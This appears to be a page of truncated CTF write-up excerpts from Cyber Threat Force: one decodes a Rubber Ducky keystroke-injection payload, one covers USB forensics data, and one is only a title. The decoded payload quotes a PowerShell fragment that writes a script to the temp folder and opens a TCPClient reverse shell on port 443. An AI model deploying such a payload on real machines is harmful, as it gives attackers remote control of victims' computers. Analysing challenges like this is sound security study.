Writeup Cyber Threat Force : Like a duck in water

Note: I did not solve this challenge during the CTF, but my teammate Lukho did.

For this challenge, we were given an inject.bin file, which contains an encoded Rubber Ducky payload. We can use the Duck Toolkit to get back the original code:

DELAY DELAY powershell Start-Process notepad -Verb runAsENTER DELAY DELAY ENTER DELAY mDELAY DOWNARROW ... DOWNARROW ENTER $folderDateTime = (get-date).ToString('d-M-y HHmmss')ENTER ... Add-Content "$env:TEMP\72794.ps1" '$c = New-Object System.Net.Sockets.TCPClient("CYBERTF{D0N4LD_DUC|<}",443);$s = $c.

Writeup Cyber Threat Force : Usb key cemetery

Note: I did not solve this challenge during the CTF, but my teammate Volker did.

For this challenge, we were given a zip containing an encoded syslog (sysloc.enc), and an auth.json file:

{ "manufact": [ "Apple Inc.", "Azurewave", "Generic", "Linux 5.10.0-kali8-amd64 xhci-hcd", "usbrip-4381" ], "pid": [ "0002", "0003", "0129", "0608", "12a8", "3491", "56dd", "usbrip-4381" ], "prod": [ "USB2.0 HD UVC WebCam", "USB2.0 Hub", "USB2.0-CRW", "iPhone", "usbrip-4381", "xHCI Host Controller" ], "serial": [ "0000:03:00.

Writeup Cyber Threat Force : Welcome to the matrix
